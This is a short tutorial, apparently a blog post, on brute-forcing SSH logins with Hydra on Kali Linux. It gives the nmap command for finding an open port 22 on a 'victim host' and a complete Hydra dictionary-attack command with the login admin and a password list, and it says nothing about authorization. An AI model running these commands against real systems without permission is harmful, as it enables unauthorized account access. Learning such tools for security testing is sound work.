Hydra is a parallelized login cracker. It can perform very fast dictionary attacks against many protocols. It supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. It is often regarded as very fast network logon cracker.
Which Platforms Does Hydra Support?
Hydra runs finely on Linux, Windows. Solaris, FreeBSD/OpenBSD, QNX and OSX. On Ubuntu, it can be installed from the synaptic package manager. On Kali, it is pre-installed. So, we’re use our Kali machine for this demo.
Step 1 Fire Up Kali
Boot into Kali or any machine with Hydra installed on it. You can also use Kali Live USB to boot anywhere directly without actually installing it.
Step 2 Search for Open SSH ports in a network
Open nmap or zenmap to find the open ssh port in the network by simply typing
nmap 172.27.16.19 -p22
- 172.27.16.19 -> victim host IP
- -p -> strict the nmap to user defined port
- 22 -> port by default used for ssh
Step 3 Start Hydra
Now that you have found the victim host with ssh open, use Hydra tool by simply typing
hydra -t 1 -l admin -P /usr/share/john/password.lst -vV 172.27.16.19 ssh
- t -> it tells how many parallel threads Hydra should create.
- l -> username or login to use.
- P -> path to password list or the word list.
- v -> verbose.
- V -> it is used for printing every password being tried.
- 172.27.16.19 -> ip of the victim host.
- ssh -> name of the service to carry on the attack.
The time for cracking might vary from few minutes to some million years. It solely depends on the complexity on the password. Let us know your queries in the comments below!